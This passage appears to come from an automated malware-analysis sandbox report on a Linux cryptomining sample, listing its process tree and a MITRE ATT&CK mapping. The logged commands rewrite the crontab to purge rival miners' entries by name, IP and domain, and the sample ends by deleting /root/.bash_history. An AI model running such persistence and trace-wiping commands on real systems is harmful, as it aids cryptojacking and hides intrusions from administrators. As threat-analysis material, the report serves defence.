  PID:1022
- /bin/sed
  sed /shuf/d
  2⤵
  PID:1023
- /usr/bin/crontab
  crontab -
  2⤵
  - Creates/modifies Cron job
  PID:1024
- /usr/bin/crontab
  crontab -l
  2⤵
  PID:1025
- /bin/sed
  sed /ash/d
  2⤵
  PID:1026
- /usr/bin/crontab
  crontab -
  2⤵
  - Creates/modifies Cron job
  PID:1027
- /usr/bin/crontab
  crontab -l
  2⤵
  PID:1030
- /bin/sed
  sed /mr.sh/d
  2⤵
  PID:1031
- /usr/bin/crontab
  crontab -
  2⤵
  - Creates/modifies Cron job
  PID:1032
- /usr/bin/crontab
  crontab -l
  2⤵
  PID:1036
- /bin/sed
  sed /185.181.10.234/d
  2⤵
  PID:1037
- /usr/bin/crontab
  crontab -
  2⤵
  - Creates/modifies Cron job
  PID:1038
- /usr/bin/crontab
  crontab -l
  2⤵
  PID:1042
- /bin/sed
  sed /localhost.xyz/d
  2⤵
  PID:1043
- /usr/bin/crontab
  crontab -
  2⤵
  - Creates/modifies Cron job
  PID:1044
- /usr/bin/crontab
  crontab -l
  2⤵
  PID:1047
- /bin/sed
  sed /45.137.151.106/d
  2⤵
  PID:1048
- /usr/bin/crontab
  crontab -
  2⤵
  - Creates/modifies Cron job
  PID:1049
- /usr/bin/crontab
  crontab -l
  2⤵
  PID:1053
- /bin/sed
  sed /111.90.159.106/d
  2⤵
  PID:1054
- /usr/bin/crontab
  crontab -
  2⤵
  - Creates/modifies Cron job
  PID:1055
- /usr/bin/crontab
  crontab -l
  2⤵
  PID:1059
- /bin/sed
  sed /github/d
  2⤵
  PID:1060
- /usr/bin/crontab
  crontab -
  2⤵
  - Creates/modifies Cron job
  PID:1061
- /usr/bin/crontab
  crontab -l
  2⤵
  PID:1064
- /bin/sed
  sed /bigd1ck.com/d
  2⤵
  PID:1065
- /usr/bin/crontab
  crontab -
  2⤵
  - Creates/modifies Cron job
  PID:1066
- /bin/sed
  sed /xmr.ipzse.com/d
  2⤵
  - System Network Configuration Discovery
  PID:1072
- /usr/bin/crontab
  crontab -l
  2⤵
  PID:1071
- /usr/bin/crontab
  crontab -
  2⤵
  - Creates/modifies Cron job
  PID:1073
- /usr/bin/crontab
  crontab -l
  2⤵
  PID:1077
- /bin/sed
  sed /185.181.10.234/d
  2⤵
  PID:1078
- /usr/bin/crontab
  crontab -
  2⤵
  - Creates/modifies Cron job
  PID:1079
- /usr/bin/crontab
  crontab -l
  2⤵
  PID:1082
- /bin/sed
  sed /146.71.79.230/d
  2⤵
  PID:1083
- /usr/bin/crontab
  crontab -
  2⤵
  - Creates/modifies Cron job
  PID:1084
- /usr/bin/crontab
  crontab -l
  2⤵
  PID:1088
- /bin/sed
  sed /122.51.164.83/d
  2⤵
  PID:1089
- /usr/bin/crontab
  crontab -
  2⤵
  - Creates/modifies Cron job
  PID:1090
- /usr/bin/crontab
  crontab -l
  2⤵
  PID:1091
- /bin/sed
  sed /newdat.sh/d
  2⤵
  PID:1092
- /usr/bin/crontab
  crontab -
  2⤵
  - Creates/modifies Cron job
  PID:1093
- /usr/bin/crontab
  crontab -l
  2⤵
  PID:1094
- /bin/sed
  sed /lib.pygensim.com/d
  2⤵
  PID:1095
- /usr/bin/crontab
  crontab -
  2⤵
  - Creates/modifies Cron job
  PID:1096
- /usr/bin/crontab
  crontab -l
  2⤵
  PID:1097
- /bin/sed
  sed /t.amynx.com/d
  2⤵
  - Reads runtime system information
  PID:1098
- /usr/bin/crontab
  crontab -
  2⤵
  - Creates/modifies Cron job
  PID:1099
- /bin/sed
  sed /update.sh/d
  2⤵
  PID:1101
- /usr/bin/crontab
  crontab -l
  2⤵
  PID:1100
- /usr/bin/crontab
  crontab -
  2⤵
  - Creates/modifies Cron job
  - Reads runtime system information
  PID:1102
- /usr/bin/crontab
  crontab -l
  2⤵
  PID:1103
- /bin/sed
  sed /systemd-service.sh/d
  2⤵
  PID:1104
- /usr/bin/crontab
  crontab -
  2⤵
  - Creates/modifies Cron job
  PID:1105
- /usr/bin/crontab
  crontab -l
  2⤵
  PID:1106
- /bin/sed
  sed /pg_stat.sh/d
  2⤵
  PID:1107
- /usr/bin/crontab
  crontab -
  2⤵
  - Creates/modifies Cron job
  PID:1108
- /usr/bin/crontab
  crontab -l
  2⤵
  PID:1109
- /bin/sed
  sed /sleep/d
  2⤵
  PID:1110
- /usr/bin/crontab
  crontab -
  2⤵
  - Creates/modifies Cron job
  PID:1111
- /usr/bin/crontab
  crontab -l
  2⤵
  PID:1112
- /bin/sed
  sed /oka/d
  2⤵
  PID:1113
- /usr/bin/crontab
  crontab -
  2⤵
  - Creates/modifies Cron job
  PID:1114
- /usr/bin/crontab
  crontab -l
  2⤵
  PID:1115
- /bin/sed
  sed /linux1213/d
  2⤵
  PID:1116
- /usr/bin/crontab
  crontab -
  2⤵
  - Creates/modifies Cron job
  PID:1117
- /usr/bin/crontab
  crontab -l
  2⤵
  PID:1118
- /bin/sed
  sed "/#wget/d"
  2⤵
  PID:1119
- /usr/bin/crontab
  crontab -
  2⤵
  - Creates/modifies Cron job
  PID:1120
- /usr/bin/crontab
  crontab -l
  2⤵
  PID:1121
- /bin/sed
  sed "/#curl/d"
  2⤵
  PID:1122
- /usr/bin/crontab
  crontab -
  2⤵
  - Creates/modifies Cron job
  PID:1123
- /bin/sed
  sed /zsvc/d
  2⤵
  PID:1125
- /usr/bin/crontab
  crontab -l
  2⤵
  PID:1124
- /usr/bin/crontab
  crontab -
  2⤵
  - Creates/modifies Cron job
  PID:1126
- /usr/bin/crontab
  crontab -l
  2⤵
  PID:1127
- /bin/sed
  sed /givemexyz/d
  2⤵
  PID:1128
- /usr/bin/crontab
  crontab -
  2⤵
  - Creates/modifies Cron job
  PID:1129
- /bin/sed
  sed /world/d
  2⤵
  PID:1131
- /usr/bin/crontab
  crontab -l
  2⤵
  PID:1130
- /usr/bin/crontab
  crontab -
  2⤵
  - Creates/modifies Cron job
  PID:1132
- /usr/bin/crontab
  crontab -l
  2⤵
  PID:1133
- /bin/sed
  sed /1.sh/d
  2⤵
  PID:1134
- /usr/bin/crontab
  crontab -
  2⤵
  - Creates/modifies Cron job
  PID:1135
- /usr/bin/crontab
  crontab -l
  2⤵
  PID:1136
- /bin/sed
  sed /3.sh/d
  2⤵
  PID:1137
- /usr/bin/crontab
  crontab -
  2⤵
  - Creates/modifies Cron job
  PID:1138
- /usr/bin/crontab
  crontab -l
  2⤵
  PID:1139
- /bin/sed
  sed /workers/d
  2⤵
  PID:1140
- /usr/bin/crontab
  crontab -
  2⤵
  - Creates/modifies Cron job
  PID:1141
- /usr/bin/crontab
  crontab -l
  2⤵
  PID:1142
- /bin/sed
  sed /oracleservice/d
  2⤵
  PID:1143
- /usr/bin/crontab
  crontab -
  2⤵
  - Creates/modifies Cron job
  PID:1144
- /usr/bin/crontab
  crontab -l
  2⤵
  PID:1145
- /bin/grep
  grep -v grep
  2⤵
  PID:1147
- /bin/grep
  grep -e 185.191.32.198
  2⤵
  PID:1146
- /usr/bin/crontab
  crontab -
  2⤵
  - Creates/modifies Cron job
  PID:1149
- /usr/bin/crontab
  crontab -l
  2⤵
  PID:1150
- /bin/rm
  rm -rf /root/.bash_history
  2⤵
  PID:1151

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Scheduled Task/Job

T1053

Cron

Shared Modules

T1129

Persistence

Boot or Logon Autostart Execution

T1547

XDG Autostart Entries

T1547.013

Create or Modify System Process

T1543

Systemd Service

T1543.002

Hijack Execution Flow

T1574

Dynamic Linker Hijacking

Scheduled Task/Job

T1053

Cron

Privilege Escalation

Boot or Logon Autostart Execution

T1547

XDG Autostart Entries

T1547.013

Create or Modify System Process

T1543

Systemd Service

T1543.002

Hijack Execution Flow

T1574

Dynamic Linker Hijacking

Scheduled Task/Job

T1053

Cron

Defense Evasion

File and Directory Permissions Modification

T1222

Linux and Mac File and Directory Permissions Modification

T1222.002

Hijack Execution Flow

T1574

Dynamic Linker Hijacking